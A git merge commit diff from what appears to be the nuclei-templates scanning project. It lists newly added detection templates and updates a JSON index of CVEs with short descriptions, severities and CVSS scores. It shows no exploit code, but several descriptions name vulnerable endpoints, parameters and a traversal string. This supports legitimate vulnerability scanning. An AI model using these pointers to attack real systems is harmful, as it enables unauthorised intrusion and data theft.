Merge branch 'k8s-templates' of https://github.com/projectdiscovery/nuclei-templates into k8s-templates

patch-4
Prince Chaddha 2024-06-18 16:04:47 +04:00
commit aebf341dc6
31 changed files with 98755 additions and 79 deletions

View File

@ -4,21 +4,36 @@ on:
paths:
- '.new-additions'
- 'cloud/aws/sns/sns-public-subscribe-access.yaml'
- 'dast/vulnerabilities/sqli/time-based-sqli.yaml'
- 'http/cves/2021/CVE-2021-38146.yaml'
- 'http/cves/2021/CVE-2021-38147.yaml'
- 'http/cves/2021/CVE-2021-43831.yaml'
- 'http/cves/2023/CVE-2023-32068.yaml'
- 'http/cves/2023/CVE-2023-38194.yaml'
- 'http/cves/2023/CVE-2023-43472.yaml'
- 'http/cves/2023/CVE-2023-51449.yaml'
- 'http/cves/2023/CVE-2023-6505.yaml'
- 'http/cves/2023/CVE-2023-6786.yaml'
- 'http/cves/2024/CVE-2024-0250.yaml'
- 'http/cves/2024/CVE-2024-1728.yaml'
- 'http/cves/2024/CVE-2024-23692.yaml'
- 'http/cves/2024/CVE-2024-2621.yaml'
- 'http/cves/2024/CVE-2024-28995.yaml'
- 'http/cves/2024/CVE-2024-31750.yaml'
- 'http/cves/2024/CVE-2024-32113.yaml'
- 'http/cves/2024/CVE-2024-3274.yaml'
- 'http/cves/2024/CVE-2024-36837.yaml'
- 'http/cves/2024/CVE-2024-37393.yaml'
- 'http/exposed-panels/lorex-panel.yaml'
- 'http/exposed-panels/oracle-application-server-panel.yaml'
- 'http/exposed-panels/turnkey-lamp-panel.yaml'
- 'http/exposed-panels/veeam-backup-manager-login.yaml'
- 'http/exposed-panels/wildix-collaboration-panel.yaml'
- 'http/misconfiguration/apache/apache-server-status-localhost.yaml'
- 'http/misconfiguration/cookies-without-secure.yaml'
- 'http/technologies/nperf-server-detect.yaml'
- 'http/vulnerabilities/gradio/gradio-lfi.yaml'
- 'http/vulnerabilities/gradio/gradio-ssrf.yaml'
- 'network/detection/mikrotik-ssh-detect.yaml'
workflow_dispatch:
jobs:

View File

@ -1,17 +1,32 @@
cloud/aws/sns/sns-public-subscribe-access.yaml
dast/vulnerabilities/sqli/time-based-sqli.yaml
http/cves/2021/CVE-2021-38146.yaml
http/cves/2021/CVE-2021-38147.yaml
http/cves/2021/CVE-2021-43831.yaml
http/cves/2023/CVE-2023-32068.yaml
http/cves/2023/CVE-2023-38194.yaml
http/cves/2023/CVE-2023-43472.yaml
http/cves/2023/CVE-2023-51449.yaml
http/cves/2023/CVE-2023-6505.yaml
http/cves/2023/CVE-2023-6786.yaml
http/cves/2024/CVE-2024-0250.yaml
http/cves/2024/CVE-2024-1728.yaml
http/cves/2024/CVE-2024-23692.yaml
http/cves/2024/CVE-2024-2621.yaml
http/cves/2024/CVE-2024-28995.yaml
http/cves/2024/CVE-2024-31750.yaml
http/cves/2024/CVE-2024-32113.yaml
http/cves/2024/CVE-2024-3274.yaml
http/cves/2024/CVE-2024-36837.yaml
http/cves/2024/CVE-2024-37393.yaml
http/exposed-panels/lorex-panel.yaml
http/exposed-panels/oracle-application-server-panel.yaml
http/exposed-panels/turnkey-lamp-panel.yaml
http/exposed-panels/veeam-backup-manager-login.yaml
http/exposed-panels/wildix-collaboration-panel.yaml
http/misconfiguration/apache/apache-server-status-localhost.yaml
http/misconfiguration/cookies-without-secure.yaml
http/technologies/nperf-server-detect.yaml
http/vulnerabilities/gradio/gradio-lfi.yaml
http/vulnerabilities/gradio/gradio-ssrf.yaml
network/detection/mikrotik-ssh-detect.yaml

View File

@ -669,7 +669,6 @@
{"ID":"CVE-2019-12581","Info":{"Name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12581.yaml"}
{"ID":"CVE-2019-12583","Info":{"Name":"Zyxel ZyWall UAG/USG - Account Creation Access","Severity":"critical","Description":"Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the \"Free Time\" component. This can lead to unauthorized network access or DoS attacks.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2019/CVE-2019-12583.yaml"}
{"ID":"CVE-2019-12593","Info":{"Name":"IceWarp Mail Server \u003c=10.4.4 - Local File Inclusion","Severity":"high","Description":"IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12593.yaml"}
{"ID":"CVE-2019-12616","Info":{"Name":"phpMyAdmin \u003c4.9.0 - Cross-Site Request Forgery","Severity":"medium","Description":"phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken \u003cimg\u003e tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-12616.yaml"}
{"ID":"CVE-2019-12725","Info":{"Name":"Zeroshell 3.9.0 - Remote Command Execution","Severity":"critical","Description":"Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12725.yaml"}
{"ID":"CVE-2019-12962","Info":{"Name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","Severity":"medium","Description":"LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12962.yaml"}
{"ID":"CVE-2019-12985","Info":{"Name":"Citrix SD-WAN Center - Remote Command Injection","Severity":"critical","Description":"Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12985.yaml"}
@ -1467,6 +1466,7 @@
{"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43778.yaml"}
{"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x - Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43798.yaml"}
{"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43810.yaml"}
{"ID":"CVE-2021-43831","Info":{"Name":"Gradio \u003c 2.5.0 - Arbitrary File Read","Severity":"high","Description":"Files on the host computer can be accessed from the Gradio interface\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-43831.yaml"}
{"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44077.yaml"}
{"ID":"CVE-2021-44138","Info":{"Name":"Caucho Resin \u003e=4.0.52 \u003c=4.0.56 - Directory traversal","Severity":"high","Description":"There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44138.yaml"}
{"ID":"CVE-2021-44139","Info":{"Name":"Alibaba Sentinel - Server-side request forgery (SSRF)","Severity":"high","Description":"There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44139.yaml"}
@ -2142,6 +2142,7 @@
{"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"}
{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
{"ID":"CVE-2023-32068","Info":{"Name":"XWiki - Open Redirect","Severity":"medium","Description":"XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-32068.yaml"}
{"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"}
{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
@ -2156,7 +2157,6 @@
{"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
{"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
{"ID":"CVE-2023-33584","Info":{"Name":"Enrollment System Project v1.0 - SQL Injection Authentication Bypass","Severity":"critical","Description":"Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33584.yaml"}
{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
{"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
@ -2319,6 +2319,7 @@
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
{"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"}
{"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"}
{"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"}
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
{"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"}
{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
@ -2375,6 +2376,7 @@
{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"}
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-1728","Info":{"Name":"Gradio \u003e 4.19.1 UploadButton - Path Traversal","Severity":"high","Description":"gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1728.yaml"}
{"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"}
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
@ -2395,6 +2397,7 @@
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
{"ID":"CVE-2024-2621","Info":{"Name":"Fujian Kelixin Communication - Command Injection","Severity":"medium","Description":"A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-2621.yaml"}
{"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"}
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
@ -2407,15 +2410,18 @@
{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
{"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"}
{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
{"ID":"CVE-2024-28995","Info":{"Name":"SolarWinds Serv-U - Directory Traversal","Severity":"high","Description":"SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-28995.yaml"}
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
{"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"}
{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
{"ID":"CVE-2024-31750","Info":{"Name":"F-logic DataCube3 - SQL Injection","Severity":"high","Description":"SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31750.yaml"}
{"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"}
{"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
{"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"}
{"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"}
{"ID":"CVE-2024-32113","Info":{"Name":"Apache OFBiz Directory Traversal - Remote Code Execution","Severity":"high","Description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32113.yaml"}
{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"}
